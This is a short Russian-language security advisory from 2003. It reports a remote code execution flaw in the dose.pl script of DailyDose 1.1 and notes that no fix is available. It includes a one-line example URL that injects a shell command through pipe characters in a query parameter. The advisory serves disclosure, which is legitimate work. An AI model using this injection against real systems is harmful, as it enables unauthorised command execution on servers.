Security Lab

Удаленное выполнение произволного кода в Daily

Дата публикации:12.11.2003
Всего просмотров:979
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Online Arts DailyDose 1.1

Описание: Уязвимость обнаружена в DailyDose. Удаленный пользователь может выполнить произвольный код на уязвимой системе.

Уязвимость обнаружена в сценарии dose.pl.

Пример/Эксплоит:

http://www.someserver.com/cgi-bin/dose.pl?daily&somefile.txt&|ls|

URL производителя: http://www.onlinearts.net

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: DailyDose v 1.1